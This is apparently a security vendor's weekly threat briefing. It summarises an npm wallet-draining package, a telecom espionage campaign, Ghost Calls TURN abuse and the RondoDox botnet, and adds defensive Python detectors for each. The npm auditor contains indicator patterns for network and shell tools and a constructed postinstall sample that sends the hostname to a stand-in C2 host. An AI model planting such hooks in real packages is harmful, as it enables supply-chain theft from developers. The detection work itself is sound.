Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
AI-Generated Malicious NPM Package Drains Solana Funds from 1,500+ Before Takedown
(TLP: CLEAR) In late July 2025, a malicious npm package named @kodane/patch-manager was published by a user identified as “Kodane.” Disguised as a utility for cache management and license validation, the package appeared legitimate, featuring polished documentation, consistent formatting, and verbose inline comments — all stylistically consistent with outputs from large language models like Claude AI. These traits included emoji usage, “Enhanced” prefixes, and AI-style README formatting, suggesting that the package was likely generated or heavily assisted by AI. Despite its seemingly benign appearance, the package had a hidden postinstall script that activated upon installation. This script deployed a malicious payload into hidden directories on macOS, Linux, and Windows systems, allowing the malware to persist silently without requiring any direct execution from the developer. By the time it was detected and removed, the package had been downloaded over 1,500 times across 17 versions.
(TLP: CLEAR) Comments: Once installed, the payload generated a unique machine ID and communicated with a command-and-control (C2) server hosted at sweeper-monitor-production.up.railway.app. The malware scanned the infected system for Solana wallet files and, upon detection, automatically drained funds to a hardcoded Solana address. The attack was subtle enough to leave behind small amounts of crypto to cover transaction fees, minimizing suspicion. Logs from the C2 server revealed multiple infections and successful wallet sweeps, indicating that the attacker actively monitored and operated the infrastructure during the campaign.
This incident represents a concerning evolution in supply-chain attacks. By using AI to produce polished package content, attackers can pass superficial code review and automated scanners, exploiting the trust developers place in open-source ecosystems like npm. The attack also highlights the risk of automated dependency updates and of lifecycle hooks that run arbitrary code at install time: a postinstall script executes on every install, in CI and on developer workstations alike, before the package is ever imported by the application. Security experts recommend reviewing packages (including their install scripts) before adoption, monitoring for suspicious postinstall behavior, pinning dependency versions with a lockfile, disabling lifecycle scripts by default where possible (npm’s ignore-scripts setting) and allow-listing the few packages that genuinely need them, and using tools that detect malicious or AI-generated patterns in code. The event underscores the growing threat of AI-assisted malware in developer environments and the need for AI-aware security practices in software supply chains.
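The install-script review recommended above can be automated. The following is an added example written for this report, not code from npm or from the analysis of @kodane/patch-manager: it lists every package that declares a preinstall/install/postinstall/prepare hook and flags hooks whose command, or the package-local script the command runs, shows the indicators described in the story (network calls, writes into hidden home-directory folders, encoded payloads, shell spawning, wallet-file references). The package names, script bodies and C2 hostname are constructed, and the indicator regexes are an assumption tuned to this campaign rather than a general malware signature set.

```python
"""Audit npm dependencies for install-time lifecycle scripts (added example)."""
from __future__ import annotations
import json
import re
from dataclasses import dataclass, field
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumption: heuristics for the campaign pattern above, not an exhaustive signature set.
INDICATORS = {
    "network": re.compile(r"\b(curl|wget|fetch\(|https?://|net\.connect|require\(['\"]https?['\"]\))"),
    "hidden_dir": re.compile(r"(~|\$HOME|%APPDATA%|os\.homedir\(\))[^\n]{0,10}?[\\/]\.[A-Za-z0-9_-]+"),
    "encoded": re.compile(r"\b(base64|atob\(|Buffer\.from\([^)]*['\"]base64['\"]\))"),
    "shell": re.compile(r"(\bchild_process\b|\bexecSync\b|\bspawn\(|/bin/sh|cmd\.exe)"),
    "wallet": re.compile(r"\b(solana|id\.json|keypair)\b", re.IGNORECASE),
}

@dataclass
class Finding:
    package: str
    hook: str
    command: str
    indicators: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)

def _hook_body(command: str, files: dict[str, str]) -> str:
    """Hook command text plus the contents of any package-local file it invokes."""
    body = command
    for token in command.split():
        rel = token.lstrip("./")            # 'node ./lib/setup.js' -> 'lib/setup.js'
        if rel in files:
            body += "\n" + files[rel]
    return body

def audit_package(name: str, package_json: str, files: dict[str, str]) -> list[Finding]:
    """files maps package-relative paths to file contents."""
    scripts = json.loads(package_json).get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            body = _hook_body(scripts[hook], files)
            hits = [label for label, rx in INDICATORS.items() if rx.search(body)]
            findings.append(Finding(name, hook, scripts[hook], hits))
    return findings

def audit_node_modules(root: Path) -> list[Finding]:
    """Entry point for a real tree: audit_node_modules(Path('node_modules'))."""
    findings = []
    for pj in root.rglob("package.json"):
        pkg_dir = pj.parent
        files = {p.relative_to(pkg_dir).as_posix(): p.read_text(errors="ignore")
                 for p in pkg_dir.rglob("*.js") if p.stat().st_size < 200_000}
        findings.extend(audit_package(pkg_dir.name, pj.read_text(errors="ignore"), files))
    return findings

# Constructed sample: a benign package and one mimicking the hidden-hook pattern.
SAMPLES = {
    "left-pad-clone": (
        '{"name": "left-pad-clone", "version": "1.0.0", "scripts": {"test": "node test.js"}}',
        {},
    ),
    "cache-helper": (
        '{"name": "cache-helper", "version": "2.1.0", "scripts": {"postinstall": "node ./lib/setup.js"}}',
        {"lib/setup.js":
            "const os = require('os'); const fs = require('fs'); const https = require('https');\n"
            "const dir = os.homedir() + '/.cache-helper';\n"
            "fs.mkdirSync(dir, { recursive: true });\n"
            "https.get('https://c2.example.invalid/ping?id=' + os.hostname());\n"},
    ),
}

def audit_samples() -> list[Finding]:
    out = []
    for name, (package_json, files) in SAMPLES.items():
        out.extend(audit_package(name, package_json, files))
    return out

if __name__ == "__main__":
    for f in audit_samples():
        status = "SUSPICIOUS " + str(f.indicators) if f.suspicious else "ok"
        print(f"{f.package}:{f.hook} -> {f.command!r} {status}")
```

Run it against a real checkout with audit_node_modules(Path("node_modules")) after an install performed with scripts disabled; any hook that is both unexpected and flagged should be read by a human before the package is allowed to run it.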
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy that blocks typical software download sites as well as hacker tools and P2P services, organizations reduce the amount of malware and trojan horses introduced unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website category feeds.
(TLP: CLEAR) Digicert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2), as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.
Sources: https://thehackernews.com/2025/08/ai-generated-malicious-npm-package.html
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
(TLP: CLEAR) Between February and November 2024, a state-sponsored threat actor known as CL‑STA‑0969 conducted a highly covert espionage campaign targeting telecommunications organizations in Southeast Asia, deploying sophisticated malware and maintaining long‑term remote control over critical infrastructure. According to researchers at Palo Alto Networks Unit 42, the group gained initial access through brute‑force attacks against SSH, using telecom-specific credential dictionaries to break into systems. Once inside, they escalated privileges via well-known Linux vulnerabilities—DirtyCOW (CVE‑2016‑5195), PwnKit (CVE‑2021‑4034), and sudo heap‑overflow (CVE‑2021‑3156)—to obtain root-level access. The attackers deployed an arsenal of custom implants tailored for telecom environments, such as AuthDoor (a malicious PAM module for persistence), Cordscan (for mobile location data harvesting), GTPDOOR (targeting GPRS roaming exchanges), EchoBackdoor (using ICMP echo requests for control), ChronosRAT (offering keystroke logging and remote shell access), and NoDepDNS (a Golang-based DNS command-and-control backdoor). They routed traffic through overlooked protocols like DNS tunneling, ICMP, and GTP, often via compromised mobile roaming networks and internal proxies, further masking their C2 traffic. To evade detection, CL‑STA‑0969 applied strong operational security (OPSEC) tactics: process masquerading with names resembling kernel threads or system services, log sanitization via tools like utmpdump and sed, disabling SELinux protections, and filesystem time stomping to impede forensic efforts. Despite the lengthy infiltration, Unit 42 found no evidence of data exfiltration or tracking of mobile devices—though tools like Cordscan suggest collection of location data may have been a goal.
(TLP: CLEAR) Comments: This campaign underscores a serious escalation in threats to telecommunications infrastructure: combining niche protocol knowledge (GTP, ICMP, DNS), bespoke malware, and adaptation to the target environment, CL‑STA‑0969 shows how a nation‑state actor can hold persistent control of critical infrastructure without detection. Mitigation steps include enforcing multi‑factor authentication (MFA) or key-only authentication on SSH and disabling direct root login (which defeats the dictionary attacks used for initial access), patching the long-known local privilege escalation flaws the group relied on, auditing PAM configuration for unauthorized modules, egress filtering that blocks covert C2 channels (including ICMP and DNS to anything but approved resolvers), and deploying network intrusion detection (NIDS) to flag anomalous protocol use such as DNS or ICMP tunneling.
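The PAM audit recommended above, as an added example for this report (it is not Unit 42 tooling and knows nothing about AuthDoor beyond what the text says, namely that it is a malicious PAM module used for persistence): the script parses pam.d-style configuration, extracts every module referenced, and reports modules that are absent from a baseline allowlist, are loaded from a path outside the normal module directories, or are not in the set of files the package manager owns. A "sufficient" control on such a module is reported separately, because it lets that one module approve a login by itself. The sample config, the "installed" file list and the module name pam_authdoor.so are constructed placeholders, not indicators from the report.

```python
"""Audit PAM stacks for unauthorised authentication modules (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass
from pathlib import Path

# Assumption: baseline for a stock Debian/Ubuntu sshd stack; regenerate per build.
BASELINE_MODULES = {
    "pam_unix.so", "pam_env.so", "pam_deny.so", "pam_permit.so", "pam_nologin.so",
    "pam_limits.so", "pam_motd.so", "pam_mail.so", "pam_loginuid.so", "pam_keyinit.so",
    "pam_selinux.so", "pam_systemd.so", "pam_faildelay.so", "pam_succeed_if.so",
}
MODULE_DIRS = (
    "/lib/security/", "/lib64/security/", "/usr/lib64/security/",
    "/lib/x86_64-linux-gnu/security/", "/usr/lib/x86_64-linux-gnu/security/",
)
LINE_RX = re.compile(
    r"^\s*(?P<type>-?(?:auth|account|password|session))\s+"
    r"(?P<control>\[[^\]]*\]|\S+)\s+(?P<module>\S+)(?P<args>.*)$"
)

@dataclass
class PamFinding:
    file: str
    lineno: int
    module: str
    control: str
    reasons: list[str]

def parse_pam(text: str):
    """Yield (lineno, type, control, module) for each active rule."""
    for n, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].rstrip()
        if not line or line.lstrip().startswith("@include"):
            continue
        m = LINE_RX.match(line)
        if m:
            yield n, m["type"], m["control"], m["module"]

def audit_pam_file(name: str, text: str, installed: set[str]) -> list[PamFinding]:
    """installed: absolute paths the package manager owns (dpkg -S / rpm -qf output)."""
    findings = []
    for lineno, _type, control, module in parse_pam(text):
        reasons = []
        base = module.rsplit("/", 1)[-1]
        if base not in BASELINE_MODULES:
            reasons.append("module not in baseline")
        if "/" in module and not module.startswith(MODULE_DIRS):
            reasons.append("loaded from non-standard path")
        candidates = [module] if "/" in module else [d + base for d in MODULE_DIRS]
        if not any(c in installed for c in candidates):
            reasons.append("not owned by an installed package")
        if reasons and control == "sufficient":
            reasons.append("'sufficient' control lets this module alone approve the login")
        if reasons:
            findings.append(PamFinding(name, lineno, module, control, reasons))
    return findings

def audit_host(installed: set[str], pam_dir: Path = Path("/etc/pam.d")) -> list[PamFinding]:
    """Entry point on a real system: pass the package-owned file set."""
    out = []
    for f in sorted(pam_dir.iterdir()):
        if f.is_file():
            out.extend(audit_pam_file(str(f), f.read_text(errors="ignore"), installed))
    return out

# Constructed sample data: package-owned module files and an sshd stack with one extra line.
INSTALLED = {
    "/lib/x86_64-linux-gnu/security/" + m
    for m in ("pam_unix.so", "pam_env.so", "pam_deny.so", "pam_permit.so", "pam_nologin.so", "pam_motd.so")
}
SSHD_PAM = """\
# PAM configuration for the Secure Shell service
auth    sufficient  /usr/lib/pam_authdoor.so
auth    required    pam_unix.so nullok
auth    required    pam_env.so
account required    pam_nologin.so
account required    pam_unix.so
session optional    pam_motd.so
"""

def audit_sample() -> list[PamFinding]:
    return audit_pam_file("/etc/pam.d/sshd", SSHD_PAM, INSTALLED)

if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f.file}:{f.lineno} {f.module} ({f.control}): {'; '.join(f.reasons)}")
```

Because the attackers also sanitized logs and stomped timestamps, the "installed" set should come from the package database rather than from file metadata, and the baseline should be captured from a known-good build, not from the host under investigation.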
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:
- Phishing: Sites known to host applications that maliciously collect personal or organizational information, including credential harvesting scams. These domains may include typo-squats – or close lookalikes of common domains. PDNS can protect users from accidentally connecting to a potentially malicious link.
- Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.
- Domain generation algorithms: Sites with programmatically generated domain names that are used by malware to circumvent static blocking. Advanced malware – including some botnets – depend on the ability to communicate with command and control (C2) infrastructure. Cyber threat actors use domain generation algorithms (DGAs) for malware to circumvent static blocking – either by domain name or IP – through programmatically generating domain names according to a pre-set seed. PDNS can offer protection from malware DGAs by analyzing every domain’s textual attribute and tagging those associated with known DGA attributes, such as high entropy.
- Content filtering: Sites whose content is in certain categories that are against an organization’s access policies. Although an ancillary benefit to malware protection, PDNS can use a categorization of various domains’ use cases (e.g., ‘gambling’) and warn or block on those that are deemed a risk for a given environment.
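Two of the PDNS detections quoted above (DGA-style names and DNS used as a covert channel) can be approximated from a resolver log. The following is an added example for this report, not code from Unit 42 or any PDNS vendor: it scores each query name on textual features (Shannon entropy, label length) and aggregates per registered domain to catch the two patterns that also appear in the CL-STA-0969 story, namely a client receiving many NXDOMAIN answers for high-entropy names (a DGA hunting for its live C2) and a flood of long, unique subdomains under one apex (data riding in DNS labels, as a DNS backdoor such as NoDepDNS would produce). The log lines and thresholds are constructed and assumed; the registered domain is taken as the last two labels, which a production tool should replace with a public suffix list lookup.

```python
"""Flag DGA-style and tunnelling-style DNS queries from a resolver log (added example)."""
from __future__ import annotations
import math
from collections import defaultdict
from dataclasses import dataclass

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's byte distribution."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

@dataclass
class Query:
    ts: str
    client: str
    qname: str
    qtype: str
    rcode: str

    @property
    def labels(self) -> list[str]:
        return self.qname.rstrip(".").lower().split(".")

    @property
    def apex(self) -> str:      # assumption: no public-suffix list, last two labels
        return ".".join(self.labels[-2:])

    @property
    def prefix(self) -> str:    # everything below the apex
        return ".".join(self.labels[:-2])

def parse_log(text: str) -> list[Query]:
    """Constructed log format: timestamp client qname qtype rcode."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5:
            out.append(Query(*parts))
    return out

# Assumed thresholds; tune against a week of your own resolver logs.
DGA_MIN_ENTROPY = 3.2        # bits/char over the second-level label
DGA_MIN_LABEL_LEN = 10
DGA_MIN_NXDOMAIN = 4         # per client
TUNNEL_MIN_UNIQUE = 4        # distinct subdomains under one apex
TUNNEL_MIN_PREFIX_LEN = 30   # mean length of those subdomains

def detect(queries: list[Query]) -> dict[str, list[str]]:
    """Return {'dga': [client, ...], 'tunnel': [apex, ...]}, both sorted."""
    nx_per_client: dict[str, int] = defaultdict(int)
    prefixes_per_apex: dict[str, set[str]] = defaultdict(set)
    for q in queries:
        sld = q.labels[-2] if len(q.labels) >= 2 else q.qname
        if (q.rcode == "NXDOMAIN" and len(sld) >= DGA_MIN_LABEL_LEN
                and shannon_entropy(sld) >= DGA_MIN_ENTROPY):
            nx_per_client[q.client] += 1
        if q.prefix:
            prefixes_per_apex[q.apex].add(q.prefix)
    dga = sorted(c for c, n in nx_per_client.items() if n >= DGA_MIN_NXDOMAIN)
    tunnel = sorted(
        apex for apex, ps in prefixes_per_apex.items()
        if len(ps) >= TUNNEL_MIN_UNIQUE
        and sum(len(p) for p in ps) / len(ps) >= TUNNEL_MIN_PREFIX_LEN
    )
    return {"dga": dga, "tunnel": tunnel}

# Constructed sample log: normal browsing, a DGA-infected host, and a DNS tunnel.
SAMPLE_LOG = """\
2025-08-01T10:00:01Z 10.0.0.5 www.example.com A NOERROR
2025-08-01T10:00:02Z 10.0.0.5 api.example.com A NOERROR
2025-08-01T10:00:03Z 10.0.0.5 wpad.corp.local A NXDOMAIN
2025-08-01T10:00:04Z 10.0.0.7 xk3j9qpwz7fa.com A NXDOMAIN
2025-08-01T10:00:05Z 10.0.0.7 qw8ezr4tybun.net A NXDOMAIN
2025-08-01T10:00:06Z 10.0.0.7 mzv5lk2hgd9c.org A NXDOMAIN
2025-08-01T10:00:07Z 10.0.0.7 bt6ync3ixw0a.info A NXDOMAIN
2025-08-01T10:00:08Z 10.0.0.9 4a1f9c0e7b2d5e8f3a6c9d0b1e2f4a5b.t.relay-sync.net TXT NOERROR
2025-08-01T10:00:09Z 10.0.0.9 9c2b7d4e1f0a3c5e8b6d2f9a4c7e1b3d.t.relay-sync.net TXT NOERROR
2025-08-01T10:00:10Z 10.0.0.9 0e5f3a9c7b1d4e2f6a8c0d3b5e7f9a1c.t.relay-sync.net TXT NOERROR
2025-08-01T10:00:11Z 10.0.0.9 7b3d9f1a5c0e2b4d6f8a1c3e5b7d9f0a.t.relay-sync.net TXT NOERROR
"""

def detect_sample() -> dict[str, list[str]]:
    return detect(parse_log(SAMPLE_LOG))

if __name__ == "__main__":
    print(detect_sample())
```

The NXDOMAIN gate matters: a DGA's failed lookups are the cheap signal, whereas a tunnel's queries all succeed, which is why the second rule keys on subdomain volume and length instead of response codes. Either hit is a reason to look at the client, not a verdict; CDNs and some telemetry services legitimately produce long hashed labels.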
(TLP: CLEAR) Digicert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real-time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.
Source: https://thehackernews.com/2025/08/cl-sta-0969-installs-covert-malware-in.html
New Ghost Calls Tactic Abuses Zoom and Microsoft Teams for C2 Operations
(TLP: CLEAR) Researchers revealed a novel evasion technique dubbed “Ghost Calls,” which leverages the TURN (Traversal Using Relays around NAT) servers operated by conferencing services such as Zoom and Microsoft Teams to conceal command‑and‑control (C2) traffic inside what looks like genuine video‑conference media. By tunneling malicious communications through the relay infrastructure of trusted conferencing platforms, attackers bypass traditional controls such as firewalls, proxy inspection, and TLS monitoring, since the traffic blends with legitimate WebRTC sessions and egresses to domains and address ranges that most organizations already allow. Ghost Calls does not exploit vulnerabilities in Zoom or Teams themselves; it misuses their TURN servers and protocol flow as designed, using legitimately issued credentials and WebRTC signaling to establish encrypted tunnels that hide exfiltration or C2 channels inside normal conferencing traffic patterns. Security firm Praetorian, which disclosed the technique, has released an open‑source toolkit called TURNt that demonstrates the covert tunneling method over conferencing infrastructure.
(TLP: CLEAR) Comments: Because traffic appears to originate from trusted collaboration services, Ghost Calls presents a significant challenge for network detection tools and enterprise defenders. Standard network monitoring sees legitimate TURN relay endpoints, while TLS inspection cannot reliably distinguish user‑initiated conferencing from hidden attacker‑controlled C2 flows. Ghost Calls is a sophisticated post‑exploitation technique that weaponizes conferencing platforms to stealthily tunnel control traffic. Organizations are advised to monitor TURN server usage patterns closely, enforce strict session authentication policies, and consider anomaly detection on WebRTC signaling and relay behavior to uncover abuse.
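Monitoring TURN usage, as suggested above, starts with being able to read the protocol. The following added example (written for this report; it is not Praetorian's TURNt nor code from Zoom or Microsoft) decodes STUN/TURN framing per RFC 5389 and RFC 5766 (20-byte header with the 0x2112A442 magic cookie, type-length-value attributes padded to 32 bits, and 4-byte ChannelData frames) so a sensor can distinguish Allocate/Refresh/ChannelBind requests from the media that follows, and then applies one session heuristic that is an assumption on our part: a relay session that stays allocated for a long time while carrying almost no data does not look like a call, because audio and video streams are continuous. All packets below are constructed.

```python
"""Decode STUN/TURN traffic and flag relay sessions that look like beacons (added example)."""
from __future__ import annotations
import struct
from dataclasses import dataclass

MAGIC_COOKIE = 0x2112A442
METHODS = {1: "Binding", 3: "Allocate", 4: "Refresh", 6: "Send", 7: "Data",
           8: "CreatePermission", 9: "ChannelBind"}
CLASSES = {0: "request", 1: "indication", 2: "success", 3: "error"}
ATTRS = {0x000C: "CHANNEL-NUMBER", 0x000D: "LIFETIME", 0x0012: "XOR-PEER-ADDRESS",
         0x0013: "DATA", 0x0016: "XOR-RELAYED-ADDRESS", 0x0019: "REQUESTED-TRANSPORT"}

def stun_method(t: int) -> int:           # RFC 5389 figure 3 bit layout
    return (t & 0x000F) | ((t & 0x00E0) >> 1) | ((t & 0x3E00) >> 2)

def stun_class(t: int) -> int:
    return ((t & 0x0100) >> 7) | ((t & 0x0010) >> 4)

def parse(buf: bytes) -> dict | None:
    """Describe one STUN message or ChannelData frame; None if it is neither."""
    if len(buf) < 4:
        return None
    if buf[0] >> 6 == 0b01:                       # ChannelData: channel(2) length(2) data
        channel, length = struct.unpack("!HH", buf[:4])
        return {"kind": "channeldata", "channel": channel, "length": length}
    if buf[0] >> 6 != 0 or len(buf) < 20:
        return None
    mtype, mlen, cookie = struct.unpack("!HHI", buf[:8])
    if cookie != MAGIC_COOKIE or len(buf) < 20 + mlen:
        return None
    attrs, off = {}, 20
    while off + 4 <= 20 + mlen:
        atype, alen = struct.unpack("!HH", buf[off:off + 4])
        attrs[ATTRS.get(atype, hex(atype))] = buf[off + 4:off + 4 + alen]
        off += 4 + ((alen + 3) & ~3)              # attribute values are padded to 32 bits
    return {"kind": "stun", "method": METHODS.get(stun_method(mtype), hex(mtype)),
            "class": CLASSES[stun_class(mtype)], "txid": buf[8:20], "attrs": attrs}

def build_stun(mtype: int, attrs: list[tuple[int, bytes]], txid: bytes = b"\x00" * 12) -> bytes:
    body = b"".join(struct.pack("!HH", t, len(v)) + v + b"\x00" * (-len(v) % 4) for t, v in attrs)
    return struct.pack("!HHI", mtype, len(body), MAGIC_COOKIE) + txid + body

def build_channeldata(channel: int, data: bytes) -> bytes:
    return struct.pack("!HH", channel, len(data)) + data + b"\x00" * (-len(data) % 4)

@dataclass
class Session:
    first: float
    last: float
    allocates: int = 0
    refreshes: int = 0
    data_bytes: int = 0

    @property
    def duration(self) -> float:
        return self.last - self.first

    @property
    def kbps(self) -> float:
        return self.data_bytes * 8 / max(self.duration, 1.0) / 1000

LONG_SESSION_S = 1800    # assumption: tune to your meeting lengths
LOW_RATE_KBPS = 8.0      # assumption: well below any real audio/video stream

def analyze(packets: list[tuple[float, str, str, bytes]]) -> dict[tuple[str, str], Session]:
    """packets: (timestamp, client, relay, payload) as captured on TURN ports (3478/443)."""
    sessions: dict[tuple[str, str], Session] = {}
    for ts, client, relay, payload in packets:
        msg = parse(payload)
        if msg is None:
            continue
        s = sessions.setdefault((client, relay), Session(ts, ts))
        s.last = max(s.last, ts)
        if msg["kind"] == "channeldata":
            s.data_bytes += msg["length"]
        elif msg["class"] == "request" and msg["method"] == "Allocate":
            s.allocates += 1
        elif msg["class"] == "request" and msg["method"] == "Refresh":
            s.refreshes += 1
    return sessions

def suspicious(sessions: dict[tuple[str, str], Session]) -> list[tuple[str, str]]:
    return sorted(k for k, s in sessions.items()
                  if s.duration >= LONG_SESSION_S and s.kbps < LOW_RATE_KBPS)

# Constructed capture: one real-looking call and one beacon through the same relay.
RELAY = "203.0.113.10"
ALLOCATE = build_stun(0x0003, [(0x0019, b"\x11\x00\x00\x00"), (0x000D, struct.pack("!I", 600))])
REFRESH = build_stun(0x0004, [(0x000D, struct.pack("!I", 600))])

def sample_packets() -> list[tuple[float, str, str, bytes]]:
    pkts = [(0.0, "10.0.1.5", RELAY, ALLOCATE), (0.0, "10.0.1.9", RELAY, ALLOCATE)]
    # meeting: 1200-byte media frames every 0.5 s for an hour
    pkts += [(i * 0.5, "10.0.1.5", RELAY, build_channeldata(0x4000, b"\xaa" * 1200)) for i in range(7200)]
    # beacon: 64-byte frames every 30 s for two hours, refreshing the allocation every 10 min
    pkts += [(30.0 * i, "10.0.1.9", RELAY, build_channeldata(0x4001, b"\xbb" * 64)) for i in range(1, 241)]
    pkts += [(600.0 * i, "10.0.1.9", RELAY, REFRESH) for i in range(1, 13)]
    return pkts

if __name__ == "__main__":
    for key, s in analyze(sample_packets()).items():
        print(key, f"{s.duration:.0f}s {s.kbps:.2f} kbit/s allocs={s.allocates} refreshes={s.refreshes}")
    print("suspicious:", suspicious(analyze(sample_packets())))
```

When TURN runs over TLS on 443, the STUN header is only visible after decryption or at the endpoint, so this logic belongs on an EDR/network sensor that sees the plaintext, or is reduced to the flow-level version: long-lived connections to conferencing relay ranges with byte counts far below a call. Correlating the client against the conferencing platform's own meeting logs (is this user actually in a meeting?) is the other cheap check.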
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.
(TLP: CLEAR) Digicert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2), as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.
RondoDox Botnet Exploits Flaws in TBK DVRs and Four-Faith Routers to Launch DDoS Attacks
(TLP: CLEAR) On July 8, 2025, researchers disclosed an emerging botnet dubbed RondoDox, which exploits known command injection vulnerabilities in specific TBK DVR and Four‑Faith router models: CVE‑2024‑3721 in the TBK DVR‑4104 and DVR‑4216, and CVE‑2024‑12856 in the Four‑Faith F3x24 and F3x36 routers. Most of these devices operate in retail stores, warehouses, small offices and similar settings where they often remain unpatched, exposed to the internet, and overlooked for extended periods.
(TLP: CLEAR) Comments: RondoDox capitalizes on this neglected infrastructure, enabling attackers to commandeer compromised devices into a stealthy botnet. Once infiltrated, these devices can be used for distributed denial-of-service (DDoS) attacks, proxy infrastructure, or other malicious operations. The botnet is particularly noteworthy for its capability to camouflage traffic by impersonating legitimate protocols and platforms such as gaming services and VPN connections, thereby evading conventional detection systems. These combined vulnerabilities have been previously exploited by Mirai botnet variants, underscoring the persistent and evolving threat posed by IoT and embedded device weaknesses.
(TLP: CLEAR) Recommended best practices/regulations: Request for Comments (RFC) 2827 / Best Current Practice (BCP) 38: “Ingress traffic filtering at the periphery of Internet connected networks will reduce the effectiveness of source address spoofing denial of service attacks. Network service providers and administrators have already begun implementing this type of filtering on periphery routers, and it is recommended that all service providers do so as soon as possible. In addition to aiding the Internet community as a whole to defeat this attack method, it can also assist service providers in locating the source of the attack if service providers can categorically demonstrate that their network already has ingress filtering in place on customer links.”
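The ingress filtering BCP 38 asks for is usually implemented as unicast reverse-path forwarding (uRPF). The following added example (written for this report, not configuration from any router vendor) models that decision: given the prefixes routed out of each customer-facing interface, strict mode accepts a packet only when the best route back to its source address leaves through the interface the packet arrived on, while loose mode only asks that some non-default route to the source exists. The routing table and packet records are constructed and use documentation address ranges.

```python
"""BCP 38 ingress filtering as a uRPF check over a longest-prefix-match table (added example)."""
from __future__ import annotations
import ipaddress
from dataclasses import dataclass

@dataclass(frozen=True)
class Route:
    prefix: object          # ipaddress.IPv4Network or IPv6Network
    iface: str

class Fib:
    """Forwarding table with longest-prefix match."""
    def __init__(self, routes: list[Route]):
        self.routes = sorted(routes, key=lambda r: r.prefix.prefixlen, reverse=True)

    def lookup(self, src: str) -> Route | None:
        ip = ipaddress.ip_address(src)
        for r in self.routes:
            if ip.version == r.prefix.version and ip in r.prefix:
                return r
        return None

def ingress_allowed(fib: Fib, iface: str, src: str, strict: bool = True) -> bool:
    route = fib.lookup(src)
    if route is None:
        return False
    if strict:
        return route.iface == iface            # must route back out the ingress interface
    return route.prefix.prefixlen > 0          # loose: any route other than the default

def verdicts(fib: Fib, packets: list[tuple[str, str, str]], strict: bool = True) -> list[tuple[str, str, str]]:
    """packets: (ingress interface, source, destination) -> (iface, src, 'accept'|'drop')."""
    return [(iface, src, "accept" if ingress_allowed(fib, iface, src, strict) else "drop")
            for iface, src, _dst in packets]

# Constructed edge-router table: one upstream link and three customer links.
ROUTES = [
    Route(ipaddress.ip_network("0.0.0.0/0"), "ge-0/0/0"),          # upstream transit
    Route(ipaddress.ip_network("192.0.2.0/24"), "ge-0/0/1"),       # customer A
    Route(ipaddress.ip_network("198.51.100.0/24"), "ge-0/0/2"),    # customer B
    Route(ipaddress.ip_network("198.51.100.128/25"), "ge-0/0/3"),  # customer B's branch site
]
PACKETS = [
    ("ge-0/0/1", "192.0.2.10", "203.0.113.80"),       # A, own address
    ("ge-0/0/1", "198.51.100.7", "203.0.113.80"),     # A spoofing B's address
    ("ge-0/0/1", "203.0.113.5", "192.0.2.10"),        # A spoofing an internet address
    ("ge-0/0/3", "198.51.100.200", "203.0.113.80"),   # branch, own address
    ("ge-0/0/2", "198.51.100.200", "203.0.113.80"),   # branch address arriving on B's main link
    ("ge-0/0/0", "203.0.113.5", "192.0.2.10"),        # internet -> customer
]

def sample_verdicts(strict: bool = True) -> list[tuple[str, str, str]]:
    return verdicts(Fib(ROUTES), PACKETS, strict)

if __name__ == "__main__":
    for (iface, src, s_v), (_, _, l_v) in zip(sample_verdicts(True), sample_verdicts(False)):
        print(f"{iface:9} {src:16} strict={s_v:6} loose={l_v}")
```

Only the strict check catches the second packet, a customer spoofing a neighbour's address that the router does know how to reach; that is why BCP 38 wants the filter on customer-facing edges, where strict mode is safe, and not on transit links where asymmetric routing would drop legitimate traffic (the fifth packet). On Cisco IOS the strict form is `ip verify unicast source reachable-via rx` on the customer interface; on a Linux router it is `net.ipv4.conf.<iface>.rp_filter=1`.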
